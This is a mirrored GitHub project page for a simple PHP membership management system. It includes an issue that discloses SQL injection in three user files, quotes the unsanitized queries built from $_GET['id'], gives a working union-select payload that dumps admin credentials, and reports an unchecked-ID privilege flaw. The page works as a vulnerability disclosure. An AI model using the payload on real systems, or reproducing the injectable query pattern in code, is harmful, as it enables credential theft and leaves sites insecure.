Light

chaodada / member Goto Github PK

View Code? Open in Web Editor NEW

25.0 0.0 6.0 873 KB

php写的简单的会员管理系统

PHP 99.08% JavaScript 0.92%

member

member's Introduction

php简单的多用户管理系统

需要环境支持pdo Gd库

使用之前先新建数据库然后导入根目录下的 data.sql

数据库配置文件 config/config.inc.php

后台登陆地址网址/admin.php

用户登陆地址网址/index.php

后台功能对用户的修改查看删除功能

前台功能用户注册用户登陆积分签到积分消费签到记录消费记录资料修改

构建完美分页类 inclode/page.class.php 构建验证码类 inclode/vcode.class.php

member's People

Contributors

Stargazers

Forkers

liwuqi loyolove imyoursskr jsyzjhj xiaozouzyk1 aike1027

member's Issues

SQL注入和越权

SQL注入

member/user/xiu_user.php

Line 27 in a592a60

    
           $sql = "select id,username,password,integral,sex,email from u_users WHERE 1=1 and id={$_GET['id']} ";

member/user/qian_user.php

Line 29 in a592a60

$sql = "select id,integral from u_users WHERE 1=1 and id={$_GET['id']} ";

member/user/xiao_user.php

Line 32 in a592a60

$sql = "select id,integral from u_users WHERE 1=1 and id={$_GET['id']} ";

拿xiu_user.php举例
payload

xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23

越权

xiu_user.php没有对用户身份进行校验导致更改ID即可查看、更改任意用户信息

拿去做靶场了希望作者不要介意 :)

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.